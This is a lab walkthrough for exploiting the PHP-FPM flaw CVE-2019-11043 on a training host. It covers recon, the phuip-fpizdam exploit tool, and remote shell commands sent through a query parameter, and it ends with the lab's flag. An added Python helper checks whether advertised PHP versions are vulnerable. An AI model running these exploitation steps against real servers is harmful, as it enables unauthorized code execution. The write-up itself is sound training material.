[CVE-2019-11043]: Exploiting the PHuiP-FPizdaM Vulnerability
In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
This bug shows how a web-facing flaw can lead to a memory corruption vulnerability (a buffer underflow) that results in OS command execution!
Reference: https://github.com/neex/phuip-fpizdam/blob/master/ZeroNights2019.pdf
Introduction
In 2019, an interesting bug was discovered in PHP-FPM. It is a buffer underflow, so exploiting it manually requires knowledge of both the binary and the web domains.
In this lab, we will learn how to detect and exploit the PHuiP-FPizdaM RCE vulnerability (CVE-2019-11043) in a realistic environment and leverage it for running arbitrary commands on the compromised server.
Lab Environment
In this lab writeup, learn to exploit a buffer underflow bug in PHP-FPM and leverage it to get OS command execution on the target machine located at http://demo.ine.local.
Objective: Exploit the PHuiP-FPizdaM vulnerability (CVE-2019-11043) and retrieve the flag!
Challenge Link: https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/6d8cbb0b-4378-436f-acea-f69cca9dd5f9
Instructions
The phuip-fpizdam tool is in /root/Desktop/tools directory.
Tools
The best tools for this lab are:
curl
Nmap
A web browser
Solution
Step 1: Open the lab link to access the Kali GUI instance.
Step 2: Check if the provided machine/domain is reachable.
Command:
ping -c3 demo.ine.local
The provided machine is reachable.
Step 3: Check open ports on the provided machine.
Command:
nmap -sS -sV demo.ine.local
Port 80 (HTTP) is open on the target machine.
Step 4: Explore the web pages hosted on the webserver.
Open the following URL in the browser:
URL: http://demo.ine.local
A coming soon page is hosted on the target server.
Step 5: Check the request headers for http://demo.ine.local and identify the vulnerability.
Let’s use curl to view the request headers:
Command:
curl -I demo.ine.local
Notice that the server is running Nginx (version 1.14.0) with PHP (version 7.1.33dev).
This means we are probably viewing the index.php page.
Open the following URL in the browser:
URL: http://demo.ine.local/index.php
Search the web for the following query:
php/7.1.33 dev exploit
Notice the results reference an RCE issue in PHP that has been assigned CVE-2019-11043. It applies to certain versions of PHP 7 running on NGINX with PHP-FPM enabled.
Open the Qualys post link and navigate to Vulnerability Scope & Details section:
It states that:
PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 are vulnerable according to CVE-2019-11043.
Since NGINX is serving PHP pages, it must have PHP-FPM enabled. Also, we have identified the PHP version used by the webserver (version 7.1.33dev) to be vulnerable to the CVE mentioned above.
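As an added example (not part of the lab or of the phuip-fpizdam tool), here is a small Python triage helper that applies the version ranges quoted above to the X-Powered-By header seen in Step 5; the header sample is constructed from the values the walkthrough reports.

```python
import re

# Fixed releases per the Qualys scope quoted above: 7.1.x < 7.1.33,
# 7.2.x < 7.2.24 and 7.3.x < 7.3.11 are affected by CVE-2019-11043.
FIXED_IN = {(7, 1): 33, (7, 2): 24, (7, 3): 11}

# Matches "PHP/7.1.33dev": three numeric parts plus an optional
# letter-led pre-release suffix (packaging suffixes like "-1ubuntu" are ignored).
VERSION_RE = re.compile(r"PHP/(\d+)\.(\d+)\.(\d+)([A-Za-z][\w.-]*)?", re.IGNORECASE)

def parse_php_version(header_value):
    """Return (major, minor, patch, prerelease_suffix) or None if no PHP version is advertised."""
    m = VERSION_RE.search(header_value or "")
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    return major, minor, patch, (m.group(4) or "")

def is_vulnerable_version(header_value):
    """True when the advertised PHP version falls in a range affected by CVE-2019-11043.
    A pre-release build such as the lab's 7.1.33dev predates the fixed 7.1.33 release,
    so a suffixed version equal to the fix number is still treated as vulnerable."""
    parsed = parse_php_version(header_value)
    if parsed is None:
        return None  # nothing to decide on from headers alone
    major, minor, patch, suffix = parsed
    fixed = FIXED_IN.get((major, minor))
    if fixed is None:
        return False  # branch outside the scope of this CVE
    if patch < fixed:
        return True
    return patch == fixed and suffix != ""

def triage_headers(raw_headers):
    """Parse raw `curl -I` output; return (server, x_powered_by, verdict)."""
    headers = {}
    for line in raw_headers.splitlines():
        if ":" in line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    powered_by = headers.get("x-powered-by", "")
    return headers.get("server", ""), powered_by, is_vulnerable_version(powered_by)

# Constructed sample modelled on what `curl -I demo.ine.local` returned in the lab.
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Server: nginx/1.14.0
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/7.1.33dev
"""

if __name__ == "__main__":
    print(triage_headers(SAMPLE_HEADERS))
```

A header match is only a triage signal: distributions often backport fixes without bumping the advertised version, so confirm with the --only-qsl check in Step 7 before drawing conclusions.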
Step 6: Check the usage for the phuip-fpizdam tool.
Information:
The researcher who identified this issue developed a tool named phuip-fpizdam to perform one-shot exploitation of this vulnerability.
The phuip-fpizdam tool is located in /root/Desktop/tools directory:
Commands:
ls /root/Desktop/tools
ls /root/Desktop/tools/phuip-fpizdam
Run this tool without any command-line arguments:
Command:
/root/Desktop/tools/phuip-fpizdam
This tool expects the target URL, and we can specify a number of flags to it.
Notice the --only-qsl flag. It helps in identifying if the server is vulnerable to this issue.
Step 7: Detect if the target web server is vulnerable.
We have already identified that the preconditions for this exploit match up perfectly (certain versions of PHP 7 running on NGINX with PHP-FPM enabled).
Now we can use the phuip-fpizdam tool to confirm if the target is vulnerable or not:
Command:
/root/Desktop/tools/phuip-fpizdam --only-qsl http://demo.ine.local/index.php
Notice the target server is reported to be vulnerable to the PHuiP-FPizdaM vulnerability.
Step 8: Exploit the vulnerability to gain code execution on the target server.
This time, we will run the phuip-fpizdam tool with the target URL and without any flags:
Command:
/root/Desktop/tools/phuip-fpizdam http://demo.ine.local/index.php
Notice the exploitation was successful. To run shell commands on the target server, we need to append the provided query parameter to the request URL.
Open the following URL in the web browser:
URL: http://demo.ine.local/index.php?a=/bin/sh+-c+%27which+which%27&
Nothing is returned on the page.
Refresh the page:
This time, we got back the results from the issued command.
Note: Chances are that you might have to refresh the URL a couple of times before you get any results. This is because several PHP-FPM workers are running on the server and only some of them were affected by the exploit. Our commands are executed only when one of the affected worker processes serves the request; otherwise, the commands won’t be executed.
Step 9: Run commands on the compromised web server.
Now that we have compromised the web server, we can run shell commands on it and perform some recon and enumeration.
Open the following URL to run the whoami command:
URL: http://demo.ine.local/index.php?a=whoami
We are running commands as the www-data user.
Inspect the process listing:
URL: http://demo.ine.local/index.php?a=ps%20aux
Notice the process listing is distorted. This is because web browsers render the newline character as ordinary whitespace in HTML and instead require the <br /> tag (line break) to insert line breaks. Since the output of the ps aux command contains newlines and not <br /> tags, we see the output in a non-readable format.
We can check the page source instead (press CTRL+U) to view the output in a much more readable format:
Now the output looks good.
Note: As explained earlier, you might not get the output from the issued commands in one go and might have to resend your requests.
Check the current working directory:
URL: http://demo.ine.local/index.php?a=pwd
The current working directory is /var/www/html.
Check the list of files present in the current working directory (the webroot directory):
URL: http://demo.ine.local/index.php?a=ls%20-al
Step 10: Retrieve the flag from the target server.
Find the flag using the following command:
Command:
find / -iname '*FLAG*' 2>/dev/null
To issue this command on the server, open the following URL in the browser:
URL:
http://demo.ine.local/index.php?a=find / -iname *FLAG* 2>/dev/null
The flag is present in the /FLAG file.
Retrieve the flag:
URL: http://demo.ine.local/index.php?a=cat%20/FLAG
FLAG: 2867dd5248874bb7a510f6ab74318bda
Conclusion
With that, we conclude this interesting PHP-FPM (buffer-underflow) bug dubbed PHuiP-FPizdaM.
We have learned how to detect and exploit this vulnerability using the phuip-fpizdam tool.
If you are curious about the intrinsic details, check out the detailed analysis done by the security researcher Orange Tsai on his blog.